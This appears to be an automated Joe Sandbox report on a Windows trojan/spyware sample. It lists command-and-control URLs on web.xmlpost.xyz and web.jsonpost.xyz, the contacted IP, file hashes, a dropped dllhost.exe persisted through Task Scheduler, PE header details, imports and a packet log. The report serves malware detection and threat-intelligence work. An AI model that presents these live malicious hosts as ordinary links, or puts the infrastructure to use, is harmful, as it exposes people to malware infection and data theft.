http://web.jsonpost.xyz/sj2vMs/index.php?scr=1 | false | | high
web.jsonpost.xyz/sj2vMs/index.php | true | 10%, Virustotal, Browse; Avira URL Cloud: phishing | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDE | dllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.phpC: | dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.phpD | dllhost.exe, 00000001.00000003.1806307598.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.phpC | dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.php: | dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.jsonpost.xyz/sj2vMs/index.php?scr=1# | dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.phpgW | dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/inl | dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.jsonpost.xyz/sj2vMs/index.phpded | dllhost.exe, 00000001.00000003.1986592314.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.jsonpost.xyz/sj2vMs/index.phpQ | dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.php/ | dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.phpv | dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.php) | dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.php( | dllhost.exe, 00000001.00000003.1775452885.00000000008C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.phpg | dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.jsonpost.xyz/sj2vMs/index.phpncoded | dllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEg3y | dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.jsonpost.xyz/sj2vMs/index.php?scr=1RE | dllhost.exe, 00000001.00000003.1986578008.0000000000912000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xQ | dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://web.xmlpo | dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEetCookiesW3 | dllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.jsonpost.xyz/sj2vMs/index.php# | dllhost.exe, 00000001.00000003.1986592314.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.php | dllhost.exe, 00000001.00000003.1871896347.000000000090A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.jsonpost.xyz/sj2vMs/index.phpncodedY | dllhost.exe, 00000001.00000003.1806307598.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.php?scr=16H | dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://web.xmlpost.xyz/sj2vMs/index.phpR | dllhost.exe, 00000001.00000003.1833860453.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                        http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEsdllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://web.jsonpost.xyz/sj2vMs/index.php?scr=1Gdllhost.exe, 00000001.00000003.1833879370.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://web.xmlpost.xdllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817713247.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://web.xmlpost.xyz/sj2vMs/index.php?scr=1dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEg4ydllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
IP:72.52.178.23
Domain:web.jsonpost.xyz
Country:United States
ASN:32244
ASN Name:LIQUIDWEBUS
Malicious:false
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1564918
                                                                                Start date and time:2024-11-29 01:51:04 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 5m 35s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:S7AGd447vH.exe
                                                                                renamed because original name is a hash value
                                                                                Original Sample Name:5F5C1A5DF77079F56EB5A61D19666728.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@13/2@18/1
                                                                                EGA Information:
                                                                                • Successful, ratio: 75%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 71
                                                                                • Number of non-executed functions: 100
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target dllhost.exe, PID 7608 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:52:04 | Task Scheduler | Run new task: dllhost.exe path: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
19:52:02 | API Interceptor | 75111x Sleep call for process: dllhost.exe modified
Match:72.52.178.23
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
http://ok.clicknowvip.com | Get hash | malicious | Unknown | Browse
                                                                                • ok.clicknowvip.com/page/bouncy.php?&bpae=GbhGd6c6okx%2Fj3OE4HtYIA68CX9ntwpoDg8E5j%2F4dndljne37pKkD5CpSoioxJaypSWFN%2B%2F7d0pdJjT%2FXeAaZtK52aNdDQePqFw%2BU3EtFy8HVw1CurFHa9v1SNkwpEvnt6kapzzY0jmrtiBi%2Fs0p6Hg1%2BWybmADL5b%2FeGqxaUo%2B3ZgqC1TD15ONDM9JCdp0IuM2%2F0ahg0EaD%2B3knPKHcpKzBm7rSKjhlh7dhj2PtSd9vXMAEGyg4Pdl4F9WFOCMl66J4OK%2FdlD4%2BJGBkAIUa4c04kq%2BFeoq%2FA6%2BDbxRArOdXle6ANZXCYNYN4VzpUDKqHkNwNdhyHvjL72y%2Fvg1F7wOrPTIlFWMmR%2FUJVZi%2FtHCN2VT7pp%2F4kFPLl%2Fsqa62NdgRS%2FlX0MozXYx6%2FHCam5PersGjq21a7r7kzBfCWTg%3D%3D&redirectType=js&inIframe=false&inPopUp=false
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer | Browse
• wxgzshna.biz/qjhbu
E_dekont.cmd | Get hash | malicious | DBatLoader, Nitol, PureLog Stealer, XWorm | Browse
• wxgzshna.biz/jubq
AsusSetup.exe | Get hash | malicious | Unknown | Browse
• wxgzshna.biz/klxaypeiwoubq
SetupRST.exe | Get hash | malicious | Unknown | Browse
• wxgzshna.biz/pmqdwnqfxl
AsusSetup.exe | Get hash | malicious | Unknown | Browse
• wxgzshna.biz/exoigpwxtw
PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe | Get hash | malicious | PureLog Stealer, RedLine | Browse
• wxgzshna.biz/rilnx
nL0Vxav3OB.exe | Get hash | malicious | Remcos | Browse
• wxgzshna.biz/rltuqai
tyRPPK48Mk.exe | Get hash | malicious | Remcos | Browse
• wxgzshna.biz/ghy
TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | Get hash | malicious | FormBook | Browse
• wxgzshna.biz/yhgadkns
Match:web.jsonpost.xyz
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
7A7A128A51A5E153C55481518BDFFE67093E94D998455.exe | Get hash | malicious | Amadey | Browse
• 149.28.87.249
Match:LIQUIDWEBUS
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
arm7.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 96.30.19.147
arm7.elf | Get hash | malicious | Mirai | Browse
• 173.199.168.212
spc.elf | Get hash | malicious | Mirai | Browse
• 173.199.168.212
https://orbistravelassistance.page/app/pages/login.php | Get hash | malicious | Unknown | Browse
• 50.28.49.125
http://ok.clicknowvip.com | Get hash | malicious | Unknown | Browse
• 72.52.178.23
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer | Browse
• 72.52.178.23
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer | Browse
• 72.52.178.23
original.eml | Get hash | malicious | Unknown | Browse
• 72.52.238.74
https://vinculocomputer.com/run/ | Get hash | malicious | Unknown | Browse
• 67.225.227.51
8dPlV2lT8o.exe | Get hash | malicious | Simda Stealer | Browse
• 72.52.179.174
                                                                                No context
                                                                                No context
                                                                                Process:C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                Category:dropped
                                                                                Size (bytes):97818
                                                                                Entropy (8bit):7.8814787262724515
                                                                                Encrypted:false
                                                                                SSDEEP:1536:CBCz5m0ikEEa/NZd4WArZy1TWJWlIRCoT3CULG5iOQnALH5w/SWCcfMJ1j9kBA8O:WO/iXVZd4WAFyMJWvoLCOG5YnMtWCZ9t
                                                                                MD5:E4B3B83778385908E63E35C651D840E5
                                                                                SHA1:CBC91F27ED9BAB76980DB23FAE70652F775A3451
                                                                                SHA-256:40A82004FBB4D08A2190A2C56EF252083EC51750904F1B0C16D3EB41F2A885CC
                                                                                SHA-512:AD0D43C91280E37B7DEDEB3CA4222DE320B28AE4A5247B0F8F968FE82494E8B853106A1907A8C0637EDB1D600BBAA0150D9F8A24C197EC303CB8CBBCDB964217
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Process:C:\Users\user\Desktop\S7AGd447vH.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):410635
                                                                                Entropy (8bit):5.73606655257235
                                                                                Encrypted:false
                                                                                SSDEEP:6144:Q5VybgaUV4kgV4YHRBduhafN7FY7WXGNJt:6ybgvAxHweFY7WXmt
                                                                                MD5:5F5C1A5DF77079F56EB5A61D19666728
                                                                                SHA1:C2A99AC26EAB563D62137C264B1A8CC9966342B9
                                                                                SHA-256:0B84CBF4FA7C5BE869AAA09B09CBB49EDCDAA3E88675304DB0EE4FA498ADC4C5
                                                                                SHA-512:1F6A6789D557D185E90ED3A667C1776BEA7D4ACB8BBBEA86DBFCE6BE86CDEA914AB0021CE6B546D72CD48E6745BFC0BFAD7B583ABAADD1AEFCC9F449814F5EB7
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                Reputation:low
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):5.73606655257235
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:S7AGd447vH.exe
                                                                                File size:410'635 bytes
                                                                                MD5:5f5c1a5df77079f56eb5a61d19666728
                                                                                SHA1:c2a99ac26eab563d62137c264b1a8cc9966342b9
                                                                                SHA256:0b84cbf4fa7c5be869aaa09b09cbb49edcdaa3e88675304db0ee4fa498adc4c5
                                                                                SHA512:1f6a6789d557d185e90ed3a667c1776bea7d4acb8bbbea86dbfce6be86cdea914ab0021ce6b546d72cd48e6745bfc0bfad7b583abaadd1aefcc9f449814f5eb7
                                                                                SSDEEP:6144:Q5VybgaUV4kgV4YHRBduhafN7FY7WXGNJt:6ybgvAxHweFY7WXmt
                                                                                TLSH:8394F120D6D69119EDE346F244B44B590A76B8E51F23DBDF6B40720A2830BE3CD3A797
                                                                                Icon Hash:aaf3e3e3938382a0
                                                                                Entrypoint:0x401000
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x61608D12 [Fri Oct 8 18:25:22 2021 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:b90ad766f05a0095e6c521f56485a931
                                                                                Instruction
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push FFFFFFFFh
                                                                                push 00409580h
                                                                                push 0040379Ch
                                                                                mov eax, dword ptr fs:[00000000h]
                                                                                push eax
                                                                                mov dword ptr fs:[00000000h], esp
                                                                                sub esp, 58h
                                                                                push ebx
                                                                                push esi
                                                                                push edi
                                                                                mov dword ptr [ebp-18h], esp
                                                                                call dword ptr [00409014h]
                                                                                xor edx, edx
                                                                                mov dl, ah
                                                                                mov dword ptr [0045F9A0h], edx
                                                                                mov ecx, eax
                                                                                and ecx, 000000FFh
                                                                                mov dword ptr [0045F99Ch], ecx
                                                                                shl ecx, 08h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5c2a8 | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x2d3c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x5ccdc | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x1b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7ce4 | 0x8000 | 967ffae6ce6347ec3c04d42af52875ef | False | 0.539825439453125 | data | 6.134797254847688 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x53d24 | 0x54000 | 73a88640da463c698e1432bc921d1c93 | False | 0.5024152483258929 | data | 5.718037310966269 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x5d000 | 0x615c | 0x5000 | 1ddbbb1e8e10422f1edd8724f57d2429 | False | 0.0318359375 | data | 0.3229831901124496 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0x2d3c | 0x3000 | ea735f3bfdfd86fc15f60a787efb4f1d | False | 0.331787109375 | data | 4.2604526171016746 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x64310 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.2521106941838649
RT_DIALOG | 0x653b8 | 0x4b4 | data | English | United States | 0.37790697674418605
RT_STRING | 0x6586c | 0xce | data | English | United States | 0.558252427184466
RT_STRING | 0x6593c | 0x3be | data | English | United States | 0.4561586638830898
RT_STRING | 0x65cfc | 0x27a | data | English | United States | 0.5
RT_STRING | 0x65f78 | 0x2b0 | data | English | United States | 0.4811046511627907
RT_STRING | 0x66228 | 0x288 | data | English | United States | 0.49228395061728397
RT_STRING | 0x664b0 | 0x21e | data | English | United States | 0.5313653136531366
RT_ACCELERATOR | 0x666d0 | 0xf0 | data | English | United States | 0.5291666666666667
RT_ACCELERATOR | 0x667c0 | 0xf0 | data | English | United States | 0.525
RT_ACCELERATOR | 0x668b0 | 0xf0 | data | English | United States | 0.5333333333333333
RT_GROUP_ICON | 0x669a0 | 0x14 | data | English | United States | 1.15
RT_VERSION | 0x669b4 | 0x388 | data | English | United States | 0.45685840707964603
DLL | Import
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW
KERNEL32.dll | RtlUnwind, GetLastError, GetVersion, VirtualFree, LeaveCriticalSection, InterlockedIncrement, HeapFree, GetACP, TlsAlloc, GetProcessHeap, InitializeCriticalSection, EnterCriticalSection, GetCPInfo, GetEnvironmentStrings, HeapReAlloc, UnhandledExceptionFilter, GetStringTypeA, GetModuleFileNameA, GetVersionExA, GetSystemTimeAsFileTime, LCMapStringW, CloseHandle, GetFileType, SetStdHandle, GetStdHandle, GetOEMCP, TlsFree, TerminateProcess, TlsSetValue, TlsGetValue, WideCharToMultiByte, ExitProcess, FreeEnvironmentStringsW, GetCurrentThreadId, InterlockedDecrement, WriteFile, HeapCreate, IsBadCodePtr, SetUnhandledExceptionFilter, GetStartupInfoA, GetEnvironmentStringsW, GetTickCount, GetStringTypeW, FreeEnvironmentStringsA, GetModuleHandleA, FlushFileBuffers, SetLastError, SetHandleCount, GetCommandLineA, DeleteCriticalSection, HeapDestroy, SetFilePointer, MultiByteToWideChar, GetCurrentProcess, IsBadReadPtr, LCMapStringA, GetEnvironmentVariableA, HeapAlloc
user32.dll | LoadStringW, KillTimer, SetWindowPos, SetWindowRgn, ShowWindow, CreateWindowExW, RegisterClassW, GetMonitorInfoW, LoadAcceleratorsW, LoadCursorW, DefWindowProcW, GetWindowRect, PostQuitMessage, LoadIconW, PostMessageW, OffsetRect, EndPaint, GetWindowLongW, TranslateAcceleratorW, AnimateWindow, IsIconic, BeginPaint, GetMessageW, MonitorFromWindow, DispatchMessageW, TranslateMessage, SetTimer
GDI32.dll | BitBlt, CreateCompatibleDC, DeleteObject, CreateRoundRectRgn
IMM32.dll | ImmGetContext, ImmReleaseContext
MSIMG32.dll | GradientFill, AlphaBlend
ole32.dll | DoDragDrop
SHELL32.dll | DragFinish, DragAcceptFiles
WINMM.dll | PlaySoundW
WInspoOl.drV | DocumentPropertiesW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Nov 29, 2024 01:52:04.702147961 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.702147961 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.702173948 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.702218056 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.820311069 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820334911 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820346117 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820389032 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820410967 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.820424080 CET804973172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.820446014 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.821909904 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.821959972 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.821964025 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.821970940 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.822020054 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.822125912 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.822169065 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.822173119 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.822212934 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.865324974 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.865407944 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:04.981235981 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:04.981328964 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.029333115 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.029416084 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.145369053 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.241234064 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.241358995 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.485297918 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.485359907 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.534672976 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.538317919 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.605416059 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658423901 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658433914 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658462048 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658466101 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658504009 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658512115 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.658544064 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.729379892 CET804973172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.730293036 CET4973180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.764666080 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.764731884 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.828640938 CET4973180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.829130888 CET4973080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:05.948574066 CET804973172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:05.948987961 CET804973072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.012587070 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.132772923 CET804973272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.132895947 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.264380932 CET4973280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.332396030 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.384409904 CET804973272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.452488899 CET804973372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:06.452554941 CET4973380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:06.452677965 CET4973380192.168.2.472.52.178.23
